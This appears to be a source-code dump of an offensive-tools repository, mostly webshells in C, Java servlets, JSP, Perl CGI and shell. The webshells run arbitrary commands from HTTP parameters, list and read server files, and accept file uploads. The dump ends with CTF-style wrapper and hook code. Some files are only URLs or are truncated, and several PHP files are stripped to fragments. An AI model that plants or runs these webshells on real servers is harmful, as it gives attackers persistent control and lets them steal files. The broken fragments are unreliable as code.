https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/webshell/asp/ice.asp -------------------------------------------------------------------------------- /webshell/asp/wumi.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/webshell/asp/wumi.asp -------------------------------------------------------------------------------- /webshell/c/cmd.c: -------------------------------------------------------------------------------- 1 | // 2 | // cmdcgi.exe 0.1 darkraver (12/05/2005) 3 | // 4 | 5 | #include 6 | 7 | 8 | char *uri_decode(char *uri) { 9 | int i=0; 10 | int ptr=0; 11 | char *command; 12 | char hexa[3]; 13 | char code; 14 | 15 | command=(char *)malloc(strlen(uri)); 16 | 17 | for(i=0;i\n"); 53 | 54 | cmd=(char *)getenv("QUERY_STRING"); 55 | 56 | if(!cmd || strlen(cmd)==0) { 57 | printf("

"); 58 | printf(""); 59 | printf(""); 60 | printf("

"); 61 | } else { 62 | //printf("QUERY_STRING: %s\n", cmd); 63 | cmd+=4; 64 | cmd=uri_decode(cmd); 65 | printf("

COMMAND: %s

\n", cmd);
66 |     fflush(stdout);
67 |     execl("/bin/sh", "/bin/sh", "-c", cmd, 0);
68 |     }
69 | 
70 | }
71 | 
72 | 
73 | 
74 | 
75 | 


--------------------------------------------------------------------------------
/webshell/jsp/CmdServlet.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/webshell/jsp/CmdServlet.class


--------------------------------------------------------------------------------
/webshell/jsp/CmdServlet.java:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * CmdServlet.java	20/01/2004
 3 |  *
 4 |  * @author The Dark Raver
 5 |  * @version 0.1
 6 |  */
 7 | 
 8 | import java.io.*;
 9 | import javax.servlet.*;
10 | import javax.servlet.http.*;
11 | 
12 | 
13 | public class CmdServlet extends HttpServlet {
14 | 
15 |     public void doGet(HttpServletRequest req, HttpServletResponse res)	throws ServletException, IOException {
16 | 		res.setContentType("text/html");
17 | 
18 | 		PrintWriter out = res.getWriter();
19 | 		out.print("");
20 | 		out.print("
");
21 | 		out.print("");
22 | 		out.print("");
23 | 		out.print("
");
24 | 
25 | 		if(req.getParameter("cmd") != null) {
26 | 	        out.print("\n
Command: " + req.getParameter("cmd") + "\n

\n");
27 | 	        Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd"));
28 | 	        DataInputStream procIn = new DataInputStream(p.getInputStream());
29 | 			int c='\0';
30 |         	while ((c=procIn.read()) != -1) {
31 | 				out.print((char)c);
32 | 				}
33 | 	        }
34 | 
35 | 		out.print("\n
");
36 | 		out.print("");
37 |     }
38 | 
39 |     public String getServletInfo() {
40 | 		return "CmdServlet 0.1";
41 |     }
42 | 
43 | }
44 | 


--------------------------------------------------------------------------------
/webshell/jsp/ListServlet.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/webshell/jsp/ListServlet.class


--------------------------------------------------------------------------------
/webshell/jsp/ListServlet.java:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * ListServlet.java
 3 |  *
 4 |  * @author Sierra
 5 |  * @version 0.1
 6 |  */
 7 | 
 8 | import java.io.*;
 9 | import javax.servlet.ServletException;
10 | import javax.servlet.http.*;
11 | 
12 | public class ListServlet extends HttpServlet
13 | {
14 | 
15 | 
16 |     public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
17 |         PrintWriter printwriter = res.getWriter();
18 | 		String path = req.getParameter("file");
19 | 
20 | 		printwriter.write("\n\nDirectory Listing\n\n\n");
21 | 		printwriter.write("\n");
22 | 		if(req.getParameter("file")==null) path = "c:\\";
23 | 		printwriter.write("

Path: " + path + "

\n");
24 | 
25 | 		File file = new File(path);
26 | 
27 | 		if(file.isDirectory())
28 | 		{
29 | 			String s = new String("Unknown");
30 | 			String s2 = new String("Black");
31 | 			File afile[] = file.listFiles();
32 | 			for(int i = 0; i < afile.length; i++)
33 | 			{
34 | 				String s1 = new String(afile[i].toString());
35 | 				printwriter.write("(");
36 | 				String s3;
37 | 				if(afile[i].isDirectory())
38 | 				{
39 | 					printwriter.write("d");
40 | 					s1 = s1 + "/";
41 | 					s3 = new String("Blue");
42 | 				} else
43 | 				if(afile[i].isFile())
44 | 				{
45 | 					printwriter.write("-");
46 | 					s3 = new String("Green");
47 | 				} else
48 | 				{
49 | 					printwriter.write("?");
50 | 					s3 = new String("Red");
51 | 				}
52 | 				if(afile[i].canRead())
53 | 					printwriter.write("r");
54 | 				else
55 | 					printwriter.write("-");
56 | 				if(afile[i].canWrite())
57 | 					printwriter.write("w");
58 | 				else
59 | 					printwriter.write("-");
60 | 				printwriter.write(") " + s1.toString() + " " + "( Size: " + afile[i].length() + " bytes )
\n");
61 | 			}
62 | 
63 | 			printwriter.write("
");
64 | 		} else
65 | 		if(file.canRead())
66 | 		{
67 | 			FileInputStream fileinputstream = new FileInputStream(file);
68 | 			int j = 0;
69 | 				while(j >= 0)
70 | 				{
71 | 					j = fileinputstream.read();
72 | 					printwriter.write(j);
73 | 				}
74 | 			fileinputstream.close();
75 | 		} else
76 | 		{
77 | 			printwriter.write("Can't Read file
");
78 | 		}
79 | 
80 |     }
81 | 
82 | 
83 |     public String getServletInfo() {
84 |         return "Directory Listing";
85 |     }
86 | }


--------------------------------------------------------------------------------
/webshell/jsp/UpServlet.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/webshell/jsp/UpServlet.class


--------------------------------------------------------------------------------
/webshell/jsp/UpServlet.java:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * UpServlet.java	29/04/2005
 3 |  *
 4 |  * @author The Dark Raver
 5 |  * @version 0.1
 6 |  */
 7 | 
 8 | import java.io.*;
 9 | import javax.servlet.*;
10 | import javax.servlet.http.*;
11 | 
12 | 
13 | public class UpServlet extends HttpServlet {
14 | 
15 |     public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
16 | 		res.setContentType("text/html");
17 | 		PrintWriter out = res.getWriter();
18 | 		out.print("");
19 | 		out.print("
");
20 | 		out.print("UPLOAD ");
21 | 		out.print("");
22 | 		out.print("
");
23 | 		out.print("");
24 | 	}
25 | 
26 | 
27 |     public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
28 | 		String tag = new String();
29 | 		int c = '\0';
30 | 		int contador = 0;
31 | 		ServletInputStream in = req.getInputStream();
32 |         DataInputStream post = new DataInputStream(in);
33 | 
34 | 		PrintWriter out = res.getWriter();
35 | 		res.setContentType("text/html");
36 | 		out.print("
");
37 | 
38 | 		while((c=post.read()) != -1 && c != '\r' && c != '\n') {
39 | 			tag=tag.concat("" + (char)c);
40 | 			contador++;
41 | 			}
42 | 
43 | 		for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;
44 | 
45 | 		// out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n");
46 | 		// out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>");
47 | 
48 | 		// (!) Uploaded File Name
49 | 
50 | 		File newfile = new File("c:\\install.log");
51 | 
52 | 		/////////////////////////
53 | 
54 | 		FileOutputStream fileout = new FileOutputStream(newfile);
55 | 
56 | 		for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) {
57 | 			c=post.read();
58 | 			fileout.write((char)c);
59 | 			}
60 | 
61 | 		fileout.close();
62 | 		out.print("<== OK");
63 | 
64 |     }
65 | 
66 | 
67 |     public String getServletInfo() {
68 | 		return "UpServlet 0.1";
69 |     }
70 | 
71 | }


--------------------------------------------------------------------------------
/webshell/jsp/cmd.jsp:
--------------------------------------------------------------------------------
 1 | <%@ page import="java.util.*,java.io.*"%>
 2 | <%
 3 | //
 4 | // JSP_KIT
 5 | //
 6 | // cmd.jsp = Command Execution (unix)
 7 | //
 8 | // by: Unknown
 9 | // modified: 27/06/2003
10 | //
11 | %>
12 | 
13 | 

14 | 
15 | 
16 | 

17 | 
18 | <%
19 | if (request.getParameter("cmd") != null) {
20 |         out.println("Command: " + request.getParameter("cmd") + "
");
21 |         Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
22 |         OutputStream os = p.getOutputStream();
23 |         InputStream in = p.getInputStream();
24 |         DataInputStream dis = new DataInputStream(in);
25 |         String disr = dis.readLine();
26 |         while ( disr != null ) {
27 |                 out.println(disr); 
28 |                 disr = dis.readLine(); 
29 |                 }
30 |         }
31 | %>
32 | 

33 | 
34 | 
35 | 
36 | 


--------------------------------------------------------------------------------
/webshell/jsp/up.jsp:
--------------------------------------------------------------------------------
  1 | 
  2 | <%@ page import="java.io.*,java.util.*,javax.servlet.*" %>
  3 | <%
  4 | //
  5 | // JSP_KIT
  6 | //
  7 | // up.jsp = File Upload (unix)
  8 | //
  9 | // by: Unknown
 10 | // modified: 27/06/2003
 11 | //
 12 | %>
 13 | 
 14 | 

 15 | 
 16 | 
 17 | 

 18 | 
 19 | <%!
 20 | public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{
 21 | 	String boundary = null;
 22 | 	Enumeration enum = request.getHeaderNames();
 23 | 	while(enum.hasMoreElements()){
 24 | 		String header = (String)enum.nextElement();
 25 | 		String hvalue = request.getHeader(header);
 26 | 		prop.setProperty((header).toLowerCase(),hvalue);
 27 | 		if("content-type".equalsIgnoreCase(header) ){
 28 | 			int idx = hvalue.lastIndexOf("boundary=");
 29 | 			if(idx != -1 ){
 30 | 				boundary= hvalue.substring(idx+9 , hvalue.length());
 31 | 			}
 32 | 		}
 33 | 	}
 34 | 	return boundary;
 35 | 	
 36 | }
 37 | public String getFileName(String secondline){
 38 | 	int len = secondline.length();
 39 | 	int idx = secondline.lastIndexOf("filename=");
 40 | 	if(idx == -1 ) return null;
 41 | 	String filename = secondline.substring(idx+10 , len-1);
 42 | 	filename = filename.replace('\\','/');
 43 | 	idx = filename.lastIndexOf("/");
 44 | 	idx = idx + 1;
 45 | 	filename = filename.substring( idx );
 46 | 	return filename;        
 47 | }
 48 | %>
 49 | <%
 50 | String DPATH = "/tmp/";
 51 | int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks
 52 | int MAXSIZE = 10; // 10 Mega Byte
 53 | String boundary = getBoundary(request,prop);
 54 | if(boundary == null ){
 55 | 	boundary = prop.getProperty("boundary"); 
 56 | 	}else{
 57 | 	boundary = "--"+boundary;
 58 | 	}
 59 | if(boundary == null ){
 60 | 	return;
 61 | 	}
 62 | Long contentsize = new Long(prop.getProperty("content-length","0"));
 63 | int c;
 64 | StringWriter st = new StringWriter();
 65 | if(contentsize.longValue() < 1L ){
 66 | 	return;
 67 | 	} 
 68 | long l = contentsize.longValue() - ROUGHSIZE; 
 69 | int KB = 1024;
 70 | int MB = 1024 * KB;
 71 | int csize = (int)(l / MB);
 72 | if(csize > MAXSIZE ){
 73 | 	return;
 74 | 	}
 75 | ServletInputStream fin =  request.getInputStream();
 76 | int cn;
 77 | int count=0;
 78 | while((c=fin.read()) != -1 ){
 79 | 	if( c == '\r') break;
 80 | 	st.write(c);
 81 | 	count++;
 82 | 	}
 83 | c=fin.read();
 84 | String tboundary = st.getBuffer().toString();
 85 | tboundary=tboundary.trim();
 86 | if(! tboundary.equalsIgnoreCase( boundary) ){
 87 | 	return;
 88 | 	}
 89 | st.close();
 90 | st = null;
 91 | st = new StringWriter();
 92 | while((c=fin.read()) != -1 ){
 93 | 	if( c == '\r' ) break;
 94 | 	st.write(c);
 95 | 	}
 96 | c=fin.read();
 97 | String secondline = st.getBuffer().toString();
 98 | String filename  =  getFileName(secondline);
 99 | st.close();
100 | st = null;
101 | st = new StringWriter();
102 | while((c=fin.read()) != -1 ){
103 | 	if( c == '\r' ) break;
104 | 	st.write( c );
105 | 	}
106 | c=fin.read();
107 | 
108 | fin.read(); 
109 | fin.read();  
110 | File newfile = null;
111 | FileOutputStream fout =null; 
112 | try{
113 | 	if(filename == null) throw new FileNotFoundException("File Name not found");
114 | 	newfile = new File(DPATH+filename); 
115 | 	fout = new FileOutputStream( newfile );
116 | 	}catch(FileNotFoundException fnexp){
117 | 	fin.close();
118 | 	return;
119 | 	}
120 | 
121 | byte b[] = null;
122 | while(l > 1024L){
123 | 	b = new byte[1024];
124 | 	fin.read(b,0,1024);
125 | 	fout.write(b);
126 | 	b=null;
127 | 	l -= 1024L;
128 | 	}
129 | if(l > 0){
130 | 	b = new byte[(int)l];
131 | 	fin.read(b,0,(int)l);
132 | 	fout.write(b);
133 | 	}
134 | 
135 | 
136 | ByteArrayOutputStream baos = new ByteArrayOutputStream();
137 | while((c = fin.read()) != -1){
138 | 	baos.write(c);
139 | 	}
140 | String laststring = baos.toString();
141 | int idx = laststring.indexOf(boundary);
142 | b = baos.toByteArray();
143 | if(idx > 2){
144 | 	fout.write(b,0,idx-2);
145 | 	}else{
146 | 	fout.close();
147 | 	newfile.delete();
148 | 	return;
149 | 	}
150 | fout.flush();
151 | fout.close();
152 | fin.close();
153 | 
154 | out.println("FileName: " + newfile.getName());
155 | out.println("FileSize: " + newfile.length());
156 | 
157 | %>
158 | 
159 | 
160 | 
161 |         
162 | 
163 | 


--------------------------------------------------------------------------------
/webshell/php/cmd.php:
--------------------------------------------------------------------------------
 1 | 
11 | 
12 | 

13 | 
14 | 
15 | 

16 | 
17 | 
22 | 

23 | 
24 | 
25 | 
26 | 


--------------------------------------------------------------------------------
/webshell/php/list.php:
--------------------------------------------------------------------------------
 1 | 
11 | 
12 | " . $filename . "
";
23 |     }
24 |   closedir($handle);
25 |   } else {
26 |   echo "FILE: " . $fichero . "
";
27 |   $fp = fopen($fichero, "r");
28 |   $buffer = fread($fp, filesize($fichero));
29 |   echo $buffer;
30 |   fclose($fp);
31 |   }
32 | 
33 | ?>


--------------------------------------------------------------------------------
/webshell/php/supershell.php:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/webshell/php/up.php:
--------------------------------------------------------------------------------
 1 | 
11 | 
12 | 
13 | 
14 | 

15 | 
16 | 
Local File: 
17 | 
Remote File: 
18 | 
19 | 




20 | 
21 | 
31 | 
32 | 
33 | 
34 | 


--------------------------------------------------------------------------------
/webshell/pl-cgi/cmd.pl:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/perl
 2 | #
 3 | # PerlKit-0.1 - http://www.t0s.org
 4 | #
 5 | # cmd.pl: Run commands on a webserver
 6 | 
 7 | use strict;
 8 | 
 9 | my ($cmd, %FORM);
10 | 
11 | $|=1;
12 | 
13 | print "Content-Type: text/html\r\n";
14 | print "\r\n";
15 | 
16 | # Get parameters
17 | 
18 | %FORM = parse_parameters($ENV{'QUERY_STRING'});
19 | 
20 | if(defined $FORM{'cmd'}) {
21 |   $cmd = $FORM{'cmd'};
22 | }
23 | 
24 | print '
25 | 
26 | 

27 | 
28 | 
29 | 

30 | 
';
31 | 
32 | if(defined $FORM{'cmd'}) {
33 |   print "Results of '$cmd' execution:\n\n";
34 |   print "-"x80;
35 |   print "\n";
36 | 
37 |   open(CMD, "($cmd) 2>&1 |") || print "Could not execute command";
38 | 
39 |   while() {
40 |     print;
41 |   }
42 | 
43 |   close(CMD);
44 |   print "-"x80;
45 |   print "\n";
46 | }
47 | 
48 | print "
";
49 | 
50 | sub parse_parameters ($) {
51 |   my %ret;
52 | 
53 |   my $input = shift;
54 | 
55 |   foreach my $pair (split('&', $input)) {
56 |     my ($var, $value) = split('=', $pair, 2);
57 |     
58 |     if($var) {
59 |       $value =~ s/\+/ /g ;
60 |       $value =~ s/%(..)/pack('c',hex($1))/eg;
61 | 
62 |       $ret{$var} = $value;
63 |     }
64 |   }
65 | 
66 |   return %ret;
67 | }
68 | 


--------------------------------------------------------------------------------
/webshell/pl-cgi/list.pl:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/perl
  2 | #
  3 | # PerlKit-0.1 - http://www.t0s.org
  4 | #
  5 | # browse.pl: Browse and download files from a webserver
  6 | 
  7 | use strict;
  8 | 
  9 | my ($path, %FORM);
 10 | 
 11 | $|=1;
 12 | 
 13 | 
 14 | # Get parameters
 15 | 
 16 | %FORM = parse_parameters($ENV{'QUERY_STRING'});
 17 | 
 18 | if(defined $FORM{'path'}) {
 19 |   $path = $FORM{'path'};
 20 | 
 21 | 
 22 | } else {
 23 |   $path = "/";
 24 | }
 25 | 
 26 | if(-f $path) { # Download selected file
 27 |   print "Content-Type: application/octet-stream\r\n";
 28 |   print "\r\n";
 29 |   open(FILE, "< $path") || print "Could not open file\n";
 30 | 
 31 |   while() {
 32 |     print;
 33 |   }
 34 | 
 35 |   close(FILE);
 36 |   exit;
 37 | }
 38 | 
 39 | print "Content-Type: text/html\r\n";
 40 | print "\r\n";
 41 | 
 42 | print '
 43 | 
 44 | 

 45 | 
 46 | 
 47 | 

 48 | Directory ' . $path . ' contents:
 49 | 

 50 | 
 51 | ';
 52 | 
 53 | if(defined $FORM{'path'}) {
 54 | 
 55 |   opendir(DIR, $path) || print "Could not open directory";
 56 | 
 57 |   foreach (sort(readdir(DIR))) {
 58 |     print get_fileinfo($path, $_). "\n";
 59 |   }
 60 | 
 61 |   closedir(DIR);
 62 |   
 63 | }
 64 | 
 65 | print "
";
 66 | 
 67 | sub parse_parameters ($) {
 68 |   my %ret;
 69 | 
 70 |   my $input = shift;
 71 | 
 72 |   foreach my $pair (split('&', $input)) {
 73 |     my ($var, $value) = split('=', $pair, 2);
 74 | 
 75 |     if($var) {
 76 |       $value =~ s/\+/ /g ;
 77 |       $value =~ s/%(..)/pack('c',hex($1))/eg;
 78 | 
 79 |       $ret{$var} = $value;
 80 |     }
 81 |   }
 82 | 
 83 |   return %ret;
 84 | }
 85 | 
 86 | sub get_fileinfo ($$) {
 87 |   my $ret;
 88 | 
 89 |   my ($dir,$filename) = @_;
 90 |   my $file = $dir . "/" . $filename;
 91 | 
 92 |   $file=~s/\/+/\//g;
 93 | 
 94 |   $ret = "";
 95 | 
 96 |   $ret .= "";
 97 | 
 98 |   if(-d $file) {
 99 |     $file=~s/\/[^\/]+\/\.\./\//g;
100 |     $ret .= "$filename";
101 |   } else {
102 |     $ret .= "$filename [D]" ;
103 |   }
104 |   $ret .= "";
105 | 
106 |   my ($dev,$ino,$mode,$nlink,$uid,$gid,$rdev,$size, $atime,$mtime,$ctime,$blksize,$blocks) = stat($file);
107 | 
108 |   $ret .= " ";
109 |   $ret .= "$size";
110 |   $ret .= "". getpwuid($uid) ."";
111 |   $ret .= "". getgrgid($gid) ."";
112 | 
113 |   $ret .= "";
114 | 
115 |   return $ret;
116 | }
117 | 


--------------------------------------------------------------------------------
/webshell/servlet/CmdServlet.java:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * CmdServlet.java	20/01/2004
 3 |  *
 4 |  * @author The Dark Raver
 5 |  * @version 0.1
 6 |  */
 7 | 
 8 | import java.io.*;
 9 | import javax.servlet.*;
10 | import javax.servlet.http.*;
11 | 
12 | 
13 | public class CmdServlet extends HttpServlet {
14 | 
15 |     public void doGet(HttpServletRequest req, HttpServletResponse res)	throws ServletException, IOException {
16 | 		res.setContentType("text/html");
17 | 
18 | 		PrintWriter out = res.getWriter();
19 | 		out.print("");
20 | 		out.print("
");
21 | 		out.print("");
22 | 		out.print("");
23 | 		out.print("
");
24 | 
25 | 		if(req.getParameter("cmd") != null) {
26 | 	        out.print("\n
Command: " + req.getParameter("cmd") + "\n

\n");
27 | 	        Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd"));
28 | 	        DataInputStream procIn = new DataInputStream(p.getInputStream());
29 | 			int c='\0';
30 |         	while ((c=procIn.read()) != -1) {
31 | 				out.print((char)c);
32 | 				}
33 | 	        }
34 | 
35 | 		out.print("\n
");
36 | 		out.print("");
37 |     }
38 | 
39 |     public String getServletInfo() {
40 | 		return "CmdServlet 0.1";
41 |     }
42 | 
43 | }
44 | 


--------------------------------------------------------------------------------
/webshell/servlet/ListServlet.java:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * ListServlet.java
 3 |  *
 4 |  * @author Sierra
 5 |  * @version 0.1
 6 |  */
 7 | 
 8 | import java.io.*;
 9 | import javax.servlet.ServletException;
10 | import javax.servlet.http.*;
11 | 
12 | public class ListServlet extends HttpServlet
13 | {
14 | 
15 | 
16 |     public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
17 |         PrintWriter printwriter = res.getWriter();
18 | 		String path = req.getParameter("file");
19 | 
20 | 		printwriter.write("\n\nDirectory Listing\n\n\n");
21 | 		printwriter.write("\n");
22 | 		if(req.getParameter("file")==null) path = "c:\\";
23 | 		printwriter.write("

Path: " + path + "

\n");
24 | 
25 | 		File file = new File(path);
26 | 
27 | 		if(file.isDirectory())
28 | 		{
29 | 			String s = new String("Unknown");
30 | 			String s2 = new String("Black");
31 | 			File afile[] = file.listFiles();
32 | 			for(int i = 0; i < afile.length; i++)
33 | 			{
34 | 				String s1 = new String(afile[i].toString());
35 | 				printwriter.write("(");
36 | 				String s3;
37 | 				if(afile[i].isDirectory())
38 | 				{
39 | 					printwriter.write("d");
40 | 					s1 = s1 + "/";
41 | 					s3 = new String("Blue");
42 | 				} else
43 | 				if(afile[i].isFile())
44 | 				{
45 | 					printwriter.write("-");
46 | 					s3 = new String("Green");
47 | 				} else
48 | 				{
49 | 					printwriter.write("?");
50 | 					s3 = new String("Red");
51 | 				}
52 | 				if(afile[i].canRead())
53 | 					printwriter.write("r");
54 | 				else
55 | 					printwriter.write("-");
56 | 				if(afile[i].canWrite())
57 | 					printwriter.write("w");
58 | 				else
59 | 					printwriter.write("-");
60 | 				printwriter.write(") " + s1.toString() + " " + "( Size: " + afile[i].length() + " bytes )
\n");
61 | 			}
62 | 
63 | 			printwriter.write("
");
64 | 		} else
65 | 		if(file.canRead())
66 | 		{
67 | 			FileInputStream fileinputstream = new FileInputStream(file);
68 | 			int j = 0;
69 | 				while(j >= 0)
70 | 				{
71 | 					j = fileinputstream.read();
72 | 					printwriter.write(j);
73 | 				}
74 | 			fileinputstream.close();
75 | 		} else
76 | 		{
77 | 			printwriter.write("Can't Read file
");
78 | 		}
79 | 
80 |     }
81 | 
82 | 
83 |     public String getServletInfo() {
84 |         return "Directory Listing";
85 |     }
86 | }


--------------------------------------------------------------------------------
/webshell/servlet/UpServlet.java:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * UpServlet.java	29/04/2005
 3 |  *
 4 |  * @author The Dark Raver
 5 |  * @version 0.1
 6 |  */
 7 | 
 8 | import java.io.*;
 9 | import javax.servlet.*;
10 | import javax.servlet.http.*;
11 | 
12 | 
13 | public class UpServlet extends HttpServlet {
14 | 
15 |     public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
16 | 		res.setContentType("text/html");
17 | 		PrintWriter out = res.getWriter();
18 | 		out.print("");
19 | 		out.print("
");
20 | 		out.print("UPLOAD ");
21 | 		out.print("");
22 | 		out.print("
");
23 | 		out.print("");
24 | 	}
25 | 
26 | 
27 |     public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
28 | 		String tag = new String();
29 | 		int c = '\0';
30 | 		int contador = 0;
31 | 		ServletInputStream in = req.getInputStream();
32 |         DataInputStream post = new DataInputStream(in);
33 | 
34 | 		PrintWriter out = res.getWriter();
35 | 		res.setContentType("text/html");
36 | 		out.print("
");
37 | 
38 | 		while((c=post.read()) != -1 && c != '\r' && c != '\n') {
39 | 			tag=tag.concat("" + (char)c);
40 | 			contador++;
41 | 			}
42 | 
43 | 		for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;
44 | 
45 | 		// out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n");
46 | 		// out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>");
47 | 
48 | 		// (!) Uploaded File Name
49 | 
50 | 		File newfile = new File("c:\\install.log");
51 | 
52 | 		/////////////////////////
53 | 
54 | 		FileOutputStream fileout = new FileOutputStream(newfile);
55 | 
56 | 		for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) {
57 | 			c=post.read();
58 | 			fileout.write((char)c);
59 | 			}
60 | 
61 | 		fileout.close();
62 | 		out.print("<== OK");
63 | 
64 |     }
65 | 
66 | 
67 |     public String getServletInfo() {
68 | 		return "UpServlet 0.1";
69 |     }
70 | 
71 | }


--------------------------------------------------------------------------------
/webshell/sh/cmd.sh:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/webshell/sh/cmd.sh


--------------------------------------------------------------------------------
/webshell/sh/list.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/sh
 2 | #
 3 | # SH_KIT
 4 | #
 5 | # list.sh = Directory & File Listing
 6 | #
 7 | # by: The Dark Raver
 8 | # modified: 16/12/2005
 9 | #
10 | 
11 | echo Content-Type: text/html
12 | echo
13 | 
14 | if [ "$QUERY_STRING" != "" ]
15 |   then
16 |   echo PATH: $QUERY_STRING "
"
17 |   echo `ls $QUERY_STRING` > /tmp/test
18 |   else
19 |   echo PATH: / "
"
20 |   echo > /tmp/test
21 |   QUERY_STRING="/"
22 |   root="1"
23 |   fi
24 | 
25 | out=`grep "/" /tmp/test`
26 | 
27 | if [ "$out" != "" ]
28 |   then
29 |     echo FICHERO: $QUERY_STRING
30 |     echo "
"
31 |     cat $QUERY_STRING
32 |   else
33 |     if [ "$root" != "1" ]
34 |       then
35 |       echo "( ) ".."
"
36 |       fi
37 |     for i in `ls $QUERY_STRING`
38 |       do
39 |       if [ "$root" == "1" ] 
40 |         then 
41 |         echo "( ) "$i"
"
42 |         else 
43 |         echo "( ) "$i"
"
44 |         fi
45 |       done
46 | 
47 |   fi


--------------------------------------------------------------------------------
/webshell/sh/up.sh:
--------------------------------------------------------------------------------
 1 | echo Content-Type: text/html
 2 | echo
 3 | echo ""
 4 | echo "
"
 5 | echo "
Local File: "
 6 | echo ""
 7 | echo "



"
 8 | echo "
"
 9 | dd count=$CONTENT_LENGTH bs=1 of=/tmp/test
10 | lineas=`cat /tmp/test | wc -l`
11 | lineas2=`expr $lineas - 4`
12 | lineas3=`expr $lineas2 - 1`
13 | tail -$lineas2 /tmp/test > /tmp/test2
14 | head -$lineas3 /tmp/test2 > /tmp/upload
15 | echo "
"
16 | cat /tmp/upload
17 | echo "
"
18 | 
19 | 


--------------------------------------------------------------------------------
/wrapper/Makefile:
--------------------------------------------------------------------------------
 1 | default:
 2 | 	@echo "\tmake hookall"
 3 | 	@echo "\tmake hook64"
 4 | 	@echo "\tmake hook32"
 5 | 	@echo "\tmake pipe"
 6 | 	@echo "\tmake socket"
 7 | 
 8 | hookall: hook64 hook32
 9 | 
10 | hook64: hook.c mdir
11 | 	gcc -fPIC -shared -o bin/hook.so hook.c -ldl
12 | hook32: hook.c mdir
13 | 	gcc -m32 -fPIC -shared -o hook.so.32 hook.c -ldl
14 | pipe: mdir
15 | 	gcc wrapper_pipe.c -o bin/wrapper_pipe
16 | socket: mdir
17 | 	gcc wrapper_socket.c -o wrapper_socket
18 | mdir:
19 | 	mkdir bin


--------------------------------------------------------------------------------
/wrapper/hook.c:
--------------------------------------------------------------------------------
 1 | #include 
 2 | 
 3 | void free(void *ptr)
 4 | {
 5 |     void *lib = dlopen("/lib/x86_64-linux-gnu/libc.so.6", RTLD_LAZY);
 6 |     void (*_free)();
 7 | 
 8 |     _free = (void(*)()) dlsym(lib, "free");
 9 |     dlclose(lib);
10 | 
11 |     _free(ptr);
12 | 
13 | }
14 | 
15 | int puts(const char *s)
16 | {
17 |     void *lib = dlopen("/lib/x86_64-linux-gnu/libc.so.6", RTLD_LAZY);
18 |     int (*_puts)(const char*);
19 | 
20 |     _puts = (int(*)()) dlsym(lib, "puts");
21 |     dlclose(lib);
22 |     return _puts(s);
23 | }
24 | 


--------------------------------------------------------------------------------
/wrapper/wrapper_pipe.c:
--------------------------------------------------------------------------------
 1 | #include 
 2 | #include 
 3 | #include 
 4 | #include 
 5 | 
 6 | #define BUFSIZE 1000
 7 | 
 8 | char *buf;
 9 | 
10 | void quit()
11 | {
12 |     exit(0);
13 | }
14 | 
15 | void timeout()
16 | {
17 |     printf("Times Up!\n");
18 |     fflush(stdout);
19 |     exit(0);
20 | }
21 | 
22 | int main(int argc, char *argv[])
23 | {
24 |     int p1[2];
25 |     int p2[2];
26 |     int pid;
27 | 
28 |     buf = (char*) malloc(BUFSIZE);
29 |     int n;
30 | 
31 |     if( argc < 2 ){
32 |         fprintf(stderr, "There is no argv\n");
33 |         exit(0);
34 |     }
35 | 
36 |     char exe[50];
37 |     sprintf(exe,"./%s",argv[1]);
38 | 
39 |     fprintf(stdout, "pwn: %s\n",exe);
40 | 
41 |     pipe(p1);
42 |     pipe(p2);
43 |     pid = fork();
44 | 
45 |     if (pid){ //parent
46 |         signal(SIGCHLD, quit);
47 |         signal(SIGALRM, timeout);
48 |         alarm(10);
49 | 
50 |         close(p1[0]);
51 |         close(p2[1]);
52 | 
53 |         // get
54 |         n = read(p2[0], buf, BUFSIZE);
55 |         write(1, buf, n);
56 | 
57 |         while (1) {
58 |             // hijack input
59 |             n = read(0, buf, BUFSIZE);
60 |             if (strstr(buf, "flag")) { // filter
61 |                 fprintf(stderr, "pwn?\n");
62 |                 exit(0);
63 |             }
64 | 
65 |             write(p1[1], buf, n);
